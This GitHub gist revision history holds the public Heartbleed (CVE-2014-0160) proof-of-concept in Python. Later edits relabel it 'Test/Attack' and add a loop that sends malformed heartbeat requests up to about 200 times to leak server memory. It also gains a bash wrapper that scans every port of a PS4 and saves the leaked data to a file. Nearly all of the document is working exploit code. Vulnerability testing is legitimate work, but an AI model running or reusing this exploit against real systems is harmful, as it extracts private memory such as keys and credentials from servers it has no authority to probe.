-
-
Save wargio/10172188 to your computer and use it in GitHub Desktop.
Revisions
-
wargio revised this gist
Apr 16, 2014 . 2 changed files with 37 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,25 @@ #!/bin/bash PORT_FOUND="0" PORT=0 if [ $# -eq 1 ]; then echo "I'm testing the port" for port in `seq 1 65535`; do echo "port=" $port ./hb-test.py $1 -p $port -P >> /dev/null if [ $? -eq 0 ]; then PORT_FOUND="1"; echo "PS4 port found! port= $port"; PORT=$port break; fi done if [ $PORT_FOUND -eq 0 ]; then echo "PS4 port not found! Something may went wrong..." else echo "I'll test the Heartbleed bug. (see the result.txt file)" ./hb-test.py $1 -p $PORT -t 1 >> result.txt fi else echo "hb-ps4 <IP PS4>" fi This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -18,6 +18,7 @@ options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') options.add_option('-t', '--times', type='int', default=201, help='Times to perform the attack [default: 200]') options.add_option('-w', '--wait', type='int', default=1, help='Seconds to wait betweens heartbleeds attacks [default: 1]') options.add_option('-P', '--test', action='store_true', default=False, help='Test if the port works') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') @@ -110,12 +111,20 @@ def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return 1 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() try: s.connect((args[0], opts.port)) except Exception, e: print 'Connection failed. Port or Address Wrong' sys.exit(1) if opts.test: s.close() return if opts.starttls: re = s.recv(4096) @@ -166,7 +175,7 @@ def main(): hb_res = hit_hb(s) s.close() print 'Ending.' if __name__ == '__main__': main() -
Apr 16, 2014 . 1 changed file with 7 additions and 5 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,6 +2,7 @@ # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. # edited by Giovanni Dante Grazioli (wargio@libero.it) import sys import struct @@ -11,11 +12,12 @@ import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test/Attack for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test [default: 443]') options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS') options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') options.add_option('-t', '--times', type='int', default=201, help='Times to perform the attack [default: 200]') options.add_option('-w', '--wait', type='int', default=1, help='Seconds to wait betweens heartbleeds attacks [default: 1]') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') @@ -143,8 +145,8 @@ def main(): hb_res = hit_hb(s) s.close() if hb_res == False: return time.sleep(opts.wait) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((args[0], opts.port)) s.send(hello) -
Apr 16, 2014 . 1 changed file with 31 additions and 13 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -15,6 +15,7 @@ options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS') options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') options.add_option('-t', '--times', type='int', default=201, help='Times to perform the attack') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') @@ -93,9 +94,7 @@ def hit_hb(s): if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) <= 3: print 'Server processed malformed heartbeat, but did not return any extra data.' return True @@ -134,19 +133,38 @@ def main(): s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() times = opts.times - 1 if times < 0: times = 0 for b in xrange(0, times, 1): print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hb_res = hit_hb(s) s.close() if hb_res == False: break time.sleep(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((args[0], opts.port)) s.send(hello) while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((args[0], opts.port)) s.send(hello) if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hb_res = hit_hb(s) s.close() print 'Ending.' if __name__ == '__main__': main() -
takeshixx created this gist
Apr 8, 2014 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,152 @@ #!/usr/bin/env python2 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS') options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) if opts.starttls: re = s.recv(4096) if opts.debug: print re s.send('ehlo starttlstest\n') re = s.recv(1024) if opts.debug: print re if not 'STARTTLS' in re: if opts.debug: print re print 'STARTTLS not supported...' sys.exit(0) s.send('starttls\n') re = s.recv(1024) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main()